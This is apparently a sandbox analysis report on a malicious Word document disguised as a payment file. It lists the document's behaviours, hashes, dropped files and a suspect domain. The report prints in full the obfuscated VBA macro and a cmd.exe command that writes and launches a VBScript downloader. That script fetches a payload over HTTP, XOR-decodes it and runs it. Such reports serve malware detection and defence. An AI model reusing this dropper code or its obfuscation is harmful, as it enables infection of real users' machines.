F6LfA9 = F6LfA9 - 1
End Select
EHHFr9o = 93824
Nn = 95
Select Case Nn
Case 34
Nn = Nn + 1
Case 71
Nn = Nn + Nn
Case Else
Nn = Nn - 1
End Select
For CVOz = 1 To EHHFr9o
GD291xs = GD291xs + 1
Next CVOz
YGQJCHlT = 25
Select Case YGQJCHlT
Case 85
YGQJCHlT = YGQJCHlT + 1
Case 3
YGQJCHlT = YGQJCHlT + YGQJCHlT
Case Else
YGQJCHlT = YGQJCHlT - 1
End Select
If GD291xs = EHHFr9o Then
TNKOXaj = 53
Select Case TNKOXaj
Case 67
TNKOXaj = TNKOXaj + 1
Case 98
TNKOXaj = TNKOXaj + TNKOXaj
Case Else
TNKOXaj = TNKOXaj - 1
End Select
Dim Qa4 As Integer, YppLCX As String
For Qa4 = 1 To 828
YppLCX = YppLCX + Qa4
Next
IUmM = 13
Select Case IUmM
Case 33
IUmM = IUmM + 1
Case 74
IUmM = IUmM + IUmM
Case Else
IUmM = IUmM - 1
End Select
SG
Else
Vt = 20
Select Case Vt
Case 53
Vt = Vt + 1
Case 26
Vt = Vt + Vt
Case Else
Vt = Vt - 1
End Select
RqZLqo
GWXi = 68
Select Case GWXi
Case 19
GWXi = GWXi + 1
Case 41
GWXi = GWXi + GWXi
Case Else
GWXi = GWXi - 1
End Select
End If
USG = 8
Select Case USG
Case 1
USG = USG + 1
Case 23
USG = USG + USG
Case Else
USG = USG - 1
End Select
End Sub
Private Sub RqZLqo()
Bmc = 14
Select Case Bmc
Case 42
Bmc = Bmc + 1
Case 83
Bmc = Bmc + Bmc
Case Else
Bmc = Bmc - 1
End Select
V4 = 98
Select Case V4
Case 55
V4 = V4 + 1
Case 58
V4 = V4 + V4
Case Else
V4 = V4 - 1
End Select
End Sub
Private Function Fm(ByVal UezpPIw As String, ByVal Laqity As Long, ByVal Lq As Variant) As String
NvDc2Wi = 89
Select Case NvDc2Wi
Case 52
NvDc2Wi = NvDc2Wi + 1
Case 64
NvDc2Wi = NvDc2Wi + NvDc2Wi
Case Else
NvDc2Wi = NvDc2Wi - 1
End Select
Dim Pe5ojB() As Byte, G9w() As Byte, GbdE As Long, EZ1f As Long
IEz = 47
Select Case IEz
Case 94
IEz = IEz + 1
Case 50
IEz = IEz + IEz
Case Else
IEz = IEz - 1
End Select
Pe5ojB = UezpPIw
YuoO1 = 94
Select Case YuoO1
Case 64
YuoO1 = YuoO1 + 1
Case 29
YuoO1 = YuoO1 + YuoO1
Case Else
YuoO1 = YuoO1 - 1
End Select
GbdE = UC(Pe5ojB)
R0Exnm = 28
Select Case R0Exnm
Case 74
R0Exnm = R0Exnm + 1
Case 9
R0Exnm = R0Exnm + R0Exnm
Case Else
R0Exnm = R0Exnm - 1
End Select
Laqity = (Laqity - 1) * 2
Ase = 90
Select Case Ase
Case 14
Ase = Ase + 1
Case 46
Ase = Ase + Ase
Case Else
Ase = Ase - 1
End Select
Lq = (Lq * 2) - 1
Uhx = 14
Select Case Uhx
Case 4
Uhx = Uhx + 1
Case 60
Uhx = Uhx + Uhx
Case Else
Uhx = Uhx - 1
End Select
If Laqity + Lq > GbdE Then Lq = GbdE - Laqity
AK5m1ll = 91
Select Case AK5m1ll
Case 10
AK5m1ll = AK5m1ll + 1
Case 11
AK5m1ll = AK5m1ll + AK5m1ll
Case Else
AK5m1ll = AK5m1ll - 1
End Select
ReDim G9w(Lq)
Y7WlH = 3
Select Case Y7WlH
Case 51
Y7WlH = Y7WlH + 1
Case 7
Y7WlH = Y7WlH + Y7WlH
Case Else
Y7WlH = Y7WlH - 1
End Select
For EZ1f = Laqity To Laqity + Lq
G9w(EZ1f - Laqity) = Pe5ojB(EZ1f)
Next EZ1f
UKQX = 72
Select Case UKQX
Case 80
UKQX = UKQX + 1
Case 30
UKQX = UKQX + UKQX
Case Else
UKQX = UKQX - 1
End Select
Fm = G9w
BFomeftYQ9 = 90
Select Case BFomeftYQ9
Case 38
BFomeftYQ9 = BFomeftYQ9 + 1
Case 23
BFomeftYQ9 = BFomeftYQ9 + BFomeftYQ9
Case Else
BFomeftYQ9 = BFomeftYQ9 - 1
End Select
End Function
Private Function Ku(ByVal QGGt1 As Integer) As String
Fdt0R = 73
Select Case Fdt0R
Case 89
Fdt0R = Fdt0R + 1
Case 69
Fdt0R = Fdt0R + Fdt0R
Case Else
Fdt0R = Fdt0R - 1
End Select
Dim SmFu(1) As Byte, FlpKR As Byte, Q2XRh As Byte
CsvP = 83
Select Case CsvP
Case 70
CsvP = CsvP + 1
Case 84
CsvP = CsvP + CsvP
Case Else
CsvP = CsvP - 1
End Select
If QGGt1 < 0 Then Exit Function
Gdhl2 = 93
Select Case Gdhl2
Case 52
Gdhl2 = Gdhl2 + 1
Case 77
Gdhl2 = Gdhl2 + Gdhl2
Case Else
Gdhl2 = Gdhl2 - 1
End Select
If QGGt1 > (7076 - 6821) Then
PEsM = 37
Select Case PEsM
Case 76
PEsM = PEsM + 1
Case 31
PEsM = PEsM + PEsM
Case Else
PEsM = PEsM - 1
End Select
Q2XRh = 0
Else
DQ = 12
Select Case DQ
Case 12
DQ = DQ + 1
Case 86
DQ = DQ + DQ
Case Else
DQ = DQ - 1
End Select
FlpKR = QGGt1
FkisrRD = 64
Select Case FkisrRD
Case 92
FkisrRD = FkisrRD + 1
Case 56
FkisrRD = FkisrRD + FkisrRD
Case Else
FkisrRD = FkisrRD - 1
End Select
Q2XRh = 0
LhhN = 70
Select Case LhhN
Case 60
LhhN = LhhN + 1
Case 17
LhhN = LhhN + LhhN
Case Else
LhhN = LhhN - 1
End Select
End If
A6ND = 79
Select Case A6ND
Case 59
A6ND = A6ND + 1
Case 20
A6ND = A6ND + A6ND
Case Else
A6ND = A6ND - 1
End Select
SmFu(0) = FlpKR
UiiRKsI = 59
Select Case UiiRKsI
Case 8
UiiRKsI = UiiRKsI + 1
Case 63
UiiRKsI = UiiRKsI + UiiRKsI
Case Else
UiiRKsI = UiiRKsI - 1
End Select
SmFu(1) = Q2XRh
Vv = 23
Select Case Vv
Case 56
Vv = Vv + 1
Case 29
Vv = Vv + Vv
Case Else
Vv = Vv - 1
End Select
Ku = SmFu
J6foF = 22
Select Case J6foF
Case 44
J6foF = J6foF + 1
Case 32
J6foF = J6foF + J6foF
Case Else
J6foF = J6foF - 1
End Select
End Function" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DF0C12B94A6DAB7386.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61159"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61159"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 69E50000
- source
- Loaded Module
-
Runs shell commands
- details
-
"/V /C set "WicWfar=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM Cr4Y7" "SuB GXr2y3(Sq6jK0j)" "R6=14" "Dim Iq" "VBAswUL=68" "Iq=tImEr+Sq6jK0j" "dO wHILE TImEr<Iq" "LoOP" "I7ioU=86" "ENd sUB" "suB LWl()" "LEC19=79" "FzI2AL=""""" "Sq6f=56" "P0f6uo=Cr4Y7 & CtKBcuB & Km("4711117A","RiPK35")" "N05=37" "N4uDk1=Km("2A3F53642C2A526A661117191D13651E6970156A6B","JIR7")" "PyhrWTY=86" "PyLn Cr4Y7 & Km("56384929","Exi1")
P0f6uo" "KKIS=46" "iF IDZ="" tHEn GXr2y3((-5013+5017))" "IDpF=67" "Tc8="TDY"" "XUQO3eX=97" "SEt Y7f3W7=cReaTEoBjeCT(Km("130A373630243077072C3C3828",Tc8))" "LSgg6F=47" "Y7f3W7.RUn N4uDk1 & P0f6uo & FzI2AL
3350-3350
6274-6274" "DVVC9c1=40" "eNd sUb" "suB S6p1()" "OaAtlf=26" "OQMe6=92727628" "Edt51=20" "foR ReNPqOv=1 tO OQMe6" "FG8k=FG8k+1" "neXT" "IUe=54" "If FG8k=OQMe6 TheN" "M8x=69" "GXr2y3((-5758+5762))" "Yh=97" "JJQ(Km("3A33423A6A1A692226422B205929272118293F58693626422B7E572F3C","FRG6JP5"))" "YxyS=88" "eND If" "Cl9ApBj=6" "eND sUB" "FUnctiON CtKBcuB()" "QC6qDWn=69" "CtKBcuB=seCOND(timE)" "WJiCPjB=10" "ENd FUnCtion" "FUnctIoN T4ps(Q2CK)" "BfXHxM=82" "T4ps=aSC(Q2CK)" "MEjOd7G=33" "eND Function" "SUb DBu9MK()" "EZnmFL=55" "dIM Ugk
Ly" "DhsSF=53" "dO WhiLE Ugk<>2190-2189" "Ly=Ly+1" "Loop" "LR=36" "ENd suB" "Sub YP()" "VYeYe=24" "Dim Eb68nG
U8SZ" "For Eb68nG = 78 To 9000665" "U8SZ = Etwttg + 93 + 6 + 90" "Next" "KFQ=31" "eND suB" "Sub BXO7(DTU85k)" "Js4hxmf=90" "DIm Df" "AlM=72" "EX0X="CF"" "Oo=25" "sET Df=CREateObjeCT(Km("07070907046D15373426272E",EX0X))" "LI2=11" "Df.oPen" "IhG2g=34" "Df.TYPe=7917-7916" "SyyA=15" "Df.writE DTU85k" "GbPORm=4" "Df.sAVEtoFIle Cr4Y7 & Km("1C282D23","R2yUO1")
5716-5714" "Lare79=96" "Df.CLOSe" "RFmHVun=75" "LWl" "EZ2c=21" "eNd suB" "FUNCtIoN PyLn(Ik,DZ)" "FyKvcg3=59" "dIM S0yM
B7HT61
RwQ05c
CFehRYL
Jo(5)" "DJ=3" "Jo(5)=52" "QEB=38" "Jo(0)=104" "U0cbnlS=5" "Jo(1)=100" "Y9xV=85" "Jo(3)=50" "Xxu=22" "Jo(4)=54" "KY2qJCt=93" "Jo(2)=107" "VOzu=88" "TY5f=30" "sEt S0yM=cReateOBjECt(Km("100D0A5A18053D2D095675011D3110170B470D1C1B21041D501C", "TCnx3hq"))" "PUAgN=95" "Set B7HT61=S0yM.geTfILe(Ik)" "Uqf=50" "Set CFehRYL=B7HT61.oPENASTExtSTrEam(7166-7165,9596-9596)" "StEr=94" "sEt RwQ05c=S0yM.CReATeTExtFiLE(DZ,6072-6071,3468-3468)" "DOQey=84" "Do unTiL CFehRYL.ATeNdoFstreAM" "RwQ05c.wRItE NuH4(UI(T4ps(CFehRYL.rEad(4429-4428))
Jo(0)))" "loOp" "Lm=3" "RwQ05c.cLosE" "RoIsjEd=53" "CFehRYL.cLOSE" "Gu=81" "enD FunCtion" "FunCtION UI(EFQZ,SE0yo)" "GLs5W=67" "UI=(EFQZ aND Not SE0yo)oR(Not EFQZ ANd SE0yo)" "Fz=33" "End FUNcTiOn" "FUnCtion NuH4(DropWv)" "AR4rv4=73" "NuH4=cHR(DropWv)" "Ms9=52" "eND fuNctIOn" "FUNCTioN JJQ(UJ)" "OYAh98=81" "DIm XvBWP
K9K" "Egz=5" "XFlglR="OGu"" "YTWf=49" "On erRor REsUMe NeXT" "SIaDj6=78" "G7BUm9T="Iz6k0A"" "ELP=97" "seT XvBWP=CREatEOBJECt(Km("2D65084228390E183858242516",G7BUm9T))" "Fn=29" "PKGDU="R2yUO1"" "YP" "T8iE1=3" "Set IBnA2RO=XvBWP.eNVIRonMent(Km("641C7B0D711D67","N4"))" "P4T8C=42" "Cr4Y7=IBnA2RO(Km("0022152C292419","XArEhhp"))&NuH4((492292/5351))& CtKBcuB & CtKBcuB" "SbAKID=42" "X32MGp="IoE7"" "FBEIRB=31" "sEt K9K=crEAteOBJEcT(Km("222C543B0036582F1B6B6F04230D631D3F",X32MGp))" "SUm6=42" "K9K.oPeN Km("3D062E","Cz")
UJ
7385-7385" "Y8bFqUP=52" "K9K.seND()" "Jh8Tf=20" "if K9K.StaTUS=(2684-2484) then" "VyHLv=44" "YP" "V480A=59" "GXr2y3((27928/6982))" "CkJP=4" "BXO7 K9K.RespoNseboDY" "Kho02=28" "Else" "Ys7jk=81" "XK="OOI4"" "UYAzy=82" "sEt K9K= creatEoBJEcT(Km("0220573D203A5B293B676C020301601B1F",XK))" "LN5O7Ce=50" "K9K.opEN Km("3F0866","VxM23")
Km("1D2701234F7C5A6145645B66427D4D7D4766447C113201325B311C3D","Su" )
5930-5930" "Ej0S=75" "K9K.senD()" "S97S7l=10" "If K9K.sTatuS=(3960-3760)ThEn BXO7 K9K.ResponSEbodY" "QIDDBm=52" "RrWUNLf=89" "end if" "FjkjO=10" "eND FuNCTiON" "NlGIUHJ=94" "S6p1" "FUnCtIOn Km(BR6M,I1qC)" "BDptlu=38" "dIm DJWA4q
Nw3Msh
NqCidt" "IbPJn=19" "fOR DJWA4q=1 tO (LEn(BR6M)/2)" "Nw3Msh=(NuH4((-3455+3493)) & NuH4((648432/9006))&(MiD(BR6M,(DJWA4q+DJWA4q)-1
2)))" "NqCidt=(T4ps(Mid(I1qC,((DJWA4q Mod Len(I1qC))+1)
1)))" "Km=Km+NuH4(UI(Nw3Msh,NqCidt))" "nEXt" "PvWrcOe=50" "eNd fUNcTIoN") do @echo %~i)>"!WicWfar!" && start "" "!WicWfar!"" on 2016-8-10.07:18:00.320 - source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/V /C set "WicWfar=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM Cr4Y7" "SuB GXr2y3(Sq6jK0j)" "R6=14" "Dim Iq" "VBAswUL=68" "Iq=tImEr+Sq6jK0j" "dO wHILE TImEr<Iq" "LoOP" "I7ioU=86" "ENd sUB" "suB LWl()" "LEC19=79" "FzI2AL=""""" "Sq6f=56" "P0f6uo=Cr4Y7 & CtKBcuB & Km("4711117A","RiPK35")" "N05=37" "N4uDk1=Km("2A3F53642C2A526A661117191D13651E6970156A6B","JIR7")" "PyhrWTY=86" "PyLn Cr4Y7 & Km("56384929","Exi1")
P0f6uo" "KKIS=46" "iF IDZ="" tHEn GXr2y3((-5013+5017))" "IDpF=67" "Tc8="TDY"" "XUQO3eX=97" "SEt Y7f3W7=cReaTEoBjeCT(Km("130A373630243077072C3C3828",Tc8))" "LSgg6F=47" "Y7f3W7.RUn N4uDk1 & P0f6uo & FzI2AL
3350-3350
6274-6274" "DVVC9c1=40" "eNd sUb" "suB S6p1()" "OaAtlf=26" "OQMe6=92727628" "Edt51=20" "foR ReNPqOv=1 tO OQMe6" "FG8k=FG8k+1" "neXT" "IUe=54" "If FG8k=OQMe6 TheN" "M8x=69" "GXr2y3((-5758+5762))" "Yh=97" "JJQ(Km("3A33423A6A1A692226422B205929272118293F58693626422B7E572F3C","FRG6JP5"))" "YxyS=88" "eND If" "Cl9ApBj=6" "eND sUB" "FUnctiON CtKBcuB()" "QC6qDWn=69" "CtKBcuB=seCOND(timE)" "WJiCPjB=10" "ENd FUnCtion" "FUnctIoN T4ps(Q2CK)" "BfXHxM=82" "T4ps=aSC(Q2CK)" "MEjOd7G=33" "eND Function" "SUb DBu9MK()" "EZnmFL=55" "dIM Ugk
Ly" "DhsSF=53" "dO WhiLE Ugk<>2190-2189" "Ly=Ly+1" "Loop" "LR=36" "ENd suB" "Sub YP()" "VYeYe=24" "Dim Eb68nG
U8SZ" "For Eb68nG = 78 To 9000665" "U8SZ = Etwttg + 93 + 6 + 90" "Next" "KFQ=31" "eND suB" "Sub BXO7(DTU85k)" "Js4hxmf=90" "DIm Df" "AlM=72" "EX0X="CF"" "Oo=25" "sET Df=CREateObjeCT(Km("07070907046D15373426272E",EX0X))" "LI2=11" "Df.oPen" "IhG2g=34" "Df.TYPe=7917-7916" "SyyA=15" "Df.writE DTU85k" "GbPORm=4" "Df.sAVEtoFIle Cr4Y7 & Km("1C282D23","R2yUO1")
5716-5714" "Lare79=96" "Df.CLOSe" "RFmHVun=75" "LWl" "EZ2c=21" "eNd suB" "FUNCtIoN PyLn(Ik,DZ)" "FyKvcg3=59" "dIM S0yM
B7HT61
RwQ05c
CFehRYL
Jo(5)" "DJ=3" "Jo(5)=52" "QEB=38" "Jo(0)=104" "U0cbnlS=5" "Jo(1)=100" "Y9xV=85" "Jo(3)=50" "Xxu=22" "Jo(4)=54" "KY2qJCt=93" "Jo(2)=107" "VOzu=88" "TY5f=30" "sEt S0yM=cReateOBjECt(Km("100D0A5A18053D2D095675011D3110170B470D1C1B21041D501C", "TCnx3hq"))" "PUAgN=95" "Set B7HT61=S0yM.geTfILe(Ik)" "Uqf=50" "Set CFehRYL=B7HT61.oPENASTExtSTrEam(7166-7165,9596-9596)" "StEr=94" "sEt RwQ05c=S0yM.CReATeTExtFiLE(DZ,6072-6071,3468-3468)" "DOQey=84" "Do unTiL CFehRYL.ATeNdoFstreAM" "RwQ05c.wRItE NuH4(UI(T4ps(CFehRYL.rEad(4429-4428))
Jo(0)))" "loOp" "Lm=3" "RwQ05c.cLosE" "RoIsjEd=53" "CFehRYL.cLOSE" "Gu=81" "enD FunCtion" "FunCtION UI(EFQZ,SE0yo)" "GLs5W=67" "UI=(EFQZ aND Not SE0yo)oR(Not EFQZ ANd SE0yo)" "Fz=33" "End FUNcTiOn" "FUnCtion NuH4(DropWv)" "AR4rv4=73" "NuH4=cHR(DropWv)" "Ms9=52" "eND fuNctIOn" "FUNCTioN JJQ(UJ)" "OYAh98=81" "DIm XvBWP
K9K" "Egz=5" "XFlglR="OGu"" "YTWf=49" "On erRor REsUMe NeXT" "SIaDj6=78" "G7BUm9T="Iz6k0A"" "ELP=97" "seT XvBWP=CREatEOBJECt(Km("2D65084228390E183858242516",G7BUm9T))" "Fn=29" "PKGDU="R2yUO1"" "YP" "T8iE1=3" "Set IBnA2RO=XvBWP.eNVIRonMent(Km("641C7B0D711D67","N4"))" "P4T8C=42" "Cr4Y7=IBnA2RO(Km("0022152C292419","XArEhhp"))&NuH4((492292/5351))& CtKBcuB & CtKBcuB" "SbAKID=42" "X32MGp="IoE7"" "FBEIRB=31" "sEt K9K=crEAteOBJEcT(Km("222C543B0036582F1B6B6F04230D631D3F",X32MGp))" "SUm6=42" "K9K.oPeN Km("3D062E","Cz")
UJ
7385-7385" "Y8bFqUP=52" "K9K.seND()" "Jh8Tf=20" "if K9K.StaTUS=(2684-2484) then" "VyHLv=44" "YP" "V480A=59" "GXr2y3((27928/6982))" "CkJP=4" "BXO7 K9K.RespoNseboDY" "Kho02=28" "Else" "Ys7jk=81" "XK="OOI4"" "UYAzy=82" "sEt K9K= creatEoBJEcT(Km("0220573D203A5B293B676C020301601B1F",XK))" "LN5O7Ce=50" "K9K.opEN Km("3F0866","VxM23")
Km("1D2701234F7C5A6145645B66427D4D7D4766447C113201325B311C3D","Su" )
5930-5930" "Ej0S=75" "K9K.senD()" "S97S7l=10" "If K9K.sTatuS=(3960-3760)ThEn BXO7 K9K.ResponSEbodY" "QIDDBm=52" "RrWUNLf=89" "end if" "FjkjO=10" "eND FuNCTiON" "NlGIUHJ=94" "S6p1" "FUnCtIOn Km(BR6M,I1qC)" "BDptlu=38" "dIm DJWA4q
Nw3Msh
NqCidt" "IbPJn=19" "fOR DJWA4q=1 tO (LEn(BR6M)/2)" "Nw3Msh=(NuH4((-3455+3493)) & NuH4((648432/9006))&(MiD(BR6M,(DJWA4q+DJWA4q)-1
2)))" "NqCidt=(T4ps(Mid(I1qC,((DJWA4q Mod Len(I1qC))+1)
1)))" "Km=Km+NuH4(UI(Nw3Msh,NqCidt))" "nEXt" "PvWrcOe=50" "eNd fUNcTIoN") do @echo %~i)>"!WicWfar!" && start "" "!WicWfar!"" (Show Process)
Spawned process "wscript.exe" with commandline ""%APPDATA%\7421.vbs"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~WRS{3ADABADE-8D29-4EC4-8035-71CB97618CC1}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"7421.vbs" has type "ASCII text with CRLF line terminators"
"~$229c8378ad060a4fc75b8207fdacdf7e0c50ab1fa531dfd6cbad0766de9d20.doc" has type "data"
"~WRS{EA1ABEFC-C34E-423C-A353-F53364F9C020}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"index.dat" has type "data"
"ExcludeDictionaryEN0409.lex" has type "Little-endian UTF-16 Unicode text with no line terminators"
"~$Normal.dotm" has type "data"
"d7229c8378ad060a4fc75b8207fdacdf7e0c50ab1fa531dfd6cbad0766de9d20.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Wed Aug 10 13:48:00 2016 mtime=Wed Aug 10 13:48:00 2016 atime=Wed Aug 10 22:47:08 2016 length=250880 window=hide"
"~WRS{E21BCA9D-446C-4368-B497-F3C124649F1D}.tmp" has type "data" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://www.iec.ch"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://www.iec.chIEC"
Pattern match: "B.CG//05"
Heuristic match: "pataplouf.com" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- "Osmol lactated verminly unforced tussock curtainwise antipathogen overbrutalized crouchmas atwitter hematocytometer gasteralgia nonanimating shouldered. Binnacles altercate hazy unbare dietitian's uterus esterified unimplied supersensualistic. Orthogenetic checkpoints illimitedness wollop superstrata hyposternal. Deuterozooid canulate fanum transmissibility persecutions deleing harass skywards scoutish bases preincorporating insected dioptometry datakit. Couchmaker circumstantiate stypticity countinghouse turioniferous gilravager convulsive bordured turmeric jinja." (Indicator: "twitter")
- source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
File Details
Aenean Gravida Nunc Limited.paymentc1.3qi71nn03he04mf_%4.rtf
- Filename
- Aenean Gravida Nunc Limited.paymentc1.3qi71nn03he04mf_%4.rtf
- Size
- 245KiB (250880 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: scribbleism , Template: Normal.dotm, Last Saved By: unrotatory , Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 3 22:27:00 2016, Last Saved Time/Date: Sun Aug 7 01:16:00 2016, Number of Pages: 1, Number of Words: 12621, Number of Characters: 71941, Security: 0
- Architecture
- WINDOWS
- SHA256
- d7229c8378ad060a4fc75b8207fdacdf7e0c50ab1fa531dfd6cbad0766de9d20
- MD5
- 94b17f4145bdfe8241ff149a039941eb
- SHA1
- 1284c8cdf097944aad774be2b46925dc5c9a5983
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 3 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\d7229c8378ad060a4fc75b8207fdacdf7e0c50ab1fa531dfd6cbad0766de9d20.doc"
(PID: 2544)
-
cmd.exe
/V /C set "WicWfar=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM Cr4Y7" "SuB GXr2y3(Sq6jK0j)" "R6=14" "Dim Iq" "VBAswUL=68" "Iq=tImEr+Sq6jK0j" "dO wHILE TImEr<Iq" "LoOP" "I7ioU=86" "ENd sUB" "suB LWl()" "LEC19=79" "FzI2AL=""""" "Sq6f=56" "P0f6uo=Cr4Y7 & CtKBcuB & Km("4711117A","RiPK35")" "N05=37" "N4uDk1=Km("2A3F53642C2A526A661117191D13651E6970156A6B","JIR7")" "PyhrWTY=86" "PyLn Cr4Y7 & Km("56384929","Exi1"),P0f6uo" "KKIS=46" "iF IDZ="" tHEn GXr2y3((-5013+5017))" "IDpF=67" "Tc8="TDY"" "XUQO3eX=97" "SEt Y7f3W7=cReaTEoBjeCT(Km("130A373630243077072C3C3828",Tc8))" "LSgg6F=47" "Y7f3W7.RUn N4uDk1 & P0f6uo & FzI2AL,3350-3350,6274-6274" "DVVC9c1=40" "eNd sUb" "suB S6p1()" "OaAtlf=26" "OQMe6=92727628" "Edt51=20" "foR ReNPqOv=1 tO OQMe6" "FG8k=FG8k+1" "neXT" "IUe=54" "If FG8k=OQMe6 TheN" "M8x=69" "GXr2y3((-5758+5762))" "Yh=97" "JJQ(Km("3A33423A6A1A692226422B205929272118293F58693626422B7E572F3C","FRG6JP5"))" "YxyS=88" "eND If" "Cl9ApBj=6" "eND sUB" "FUnctiON CtKBcuB()" "QC6qDWn=69" "CtKBcuB=seCOND(timE)" "WJiCPjB=10" "ENd FUnCtion" "FUnctIoN T4ps(Q2CK)" "BfXHxM=82" "T4ps=aSC(Q2CK)" "MEjOd7G=33" "eND Function" "SUb DBu9MK()" "EZnmFL=55" "dIM Ugk,Ly" "DhsSF=53" "dO WhiLE Ugk<>2190-2189" "Ly=Ly+1" "Loop" "LR=36" "ENd suB" "Sub YP()" "VYeYe=24" "Dim Eb68nG, U8SZ" "For Eb68nG = 78 To 9000665" "U8SZ = Etwttg + 93 + 6 + 90" "Next" "KFQ=31" "eND suB" "Sub BXO7(DTU85k)" "Js4hxmf=90" "DIm Df" "AlM=72" "EX0X="CF"" "Oo=25" "sET Df=CREateObjeCT(Km("07070907046D15373426272E",EX0X))" "LI2=11" "Df.oPen" "IhG2g=34" "Df.TYPe=7917-7916" "SyyA=15" "Df.writE DTU85k" "GbPORm=4" "Df.sAVEtoFIle Cr4Y7 & Km("1C282D23","R2yUO1"),5716-5714" "Lare79=96" "Df.CLOSe" "RFmHVun=75" "LWl" "EZ2c=21" "eNd suB" "FUNCtIoN PyLn(Ik,DZ)" "FyKvcg3=59" "dIM S0yM,B7HT61,RwQ05c,CFehRYL,Jo(5)" "DJ=3" "Jo(5)=52" "QEB=38" "Jo(0)=104" "U0cbnlS=5" "Jo(1)=100" "Y9xV=85" "Jo(3)=50" "Xxu=22" "Jo(4)=54" "KY2qJCt=93" "Jo(2)=107" "VOzu=88" "TY5f=30" "sEt S0yM=cReateOBjECt(Km("100D0A5A18053D2D095675011D3110170B470D1C1B21041D501C", "TCnx3hq"))" "PUAgN=95" "Set B7HT61=S0yM.geTfILe(Ik)" "Uqf=50" "Set CFehRYL=B7HT61.oPENASTExtSTrEam(7166-7165,9596-9596)" "StEr=94" "sEt RwQ05c=S0yM.CReATeTExtFiLE(DZ,6072-6071,3468-3468)" "DOQey=84" "Do unTiL CFehRYL.ATeNdoFstreAM" "RwQ05c.wRItE NuH4(UI(T4ps(CFehRYL.rEad(4429-4428)),Jo(0)))" "loOp" "Lm=3" "RwQ05c.cLosE" "RoIsjEd=53" "CFehRYL.cLOSE" "Gu=81" "enD FunCtion" "FunCtION UI(EFQZ,SE0yo)" "GLs5W=67" "UI=(EFQZ aND Not SE0yo)oR(Not EFQZ ANd SE0yo)" "Fz=33" "End FUNcTiOn" "FUnCtion NuH4(DropWv)" "AR4rv4=73" "NuH4=cHR(DropWv)" "Ms9=52" "eND fuNctIOn" "FUNCTioN JJQ(UJ)" "OYAh98=81" "DIm XvBWP,K9K" "Egz=5" "XFlglR="OGu"" "YTWf=49" "On erRor REsUMe NeXT" "SIaDj6=78" "G7BUm9T="Iz6k0A"" "ELP=97" "seT XvBWP=CREatEOBJECt(Km("2D65084228390E183858242516",G7BUm9T))" "Fn=29" "PKGDU="R2yUO1"" "YP" "T8iE1=3" "Set IBnA2RO=XvBWP.eNVIRonMent(Km("641C7B0D711D67","N4"))" "P4T8C=42" "Cr4Y7=IBnA2RO(Km("0022152C292419","XArEhhp"))&NuH4((492292/5351))& CtKBcuB & CtKBcuB" "SbAKID=42" "X32MGp="IoE7"" "FBEIRB=31" "sEt K9K=crEAteOBJEcT(Km("222C543B0036582F1B6B6F04230D631D3F",X32MGp))" "SUm6=42" "K9K.oPeN Km("3D062E","Cz"),UJ,7385-7385" "Y8bFqUP=52" "K9K.seND()" "Jh8Tf=20" "if K9K.StaTUS=(2684-2484) then" "VyHLv=44" "YP" "V480A=59" "GXr2y3((27928/6982))" "CkJP=4" "BXO7 K9K.RespoNseboDY" "Kho02=28" "Else" "Ys7jk=81" "XK="OOI4"" "UYAzy=82" "sEt K9K= creatEoBJEcT(Km("0220573D203A5B293B676C020301601B1F",XK))" "LN5O7Ce=50" "K9K.opEN Km("3F0866","VxM23"),Km("1D2701234F7C5A6145645B66427D4D7D4766447C113201325B311C3D","Su" ),5930-5930" "Ej0S=75" "K9K.senD()" "S97S7l=10" "If K9K.sTatuS=(3960-3760)ThEn BXO7 K9K.ResponSEbodY" "QIDDBm=52" "RrWUNLf=89" "end if" "FjkjO=10" "eND FuNCTiON" "NlGIUHJ=94" "S6p1" "FUnCtIOn Km(BR6M,I1qC)" "BDptlu=38" "dIm DJWA4q,Nw3Msh,NqCidt" "IbPJn=19" "fOR DJWA4q=1 tO (LEn(BR6M)/2)" "Nw3Msh=(NuH4((-3455+3493)) & 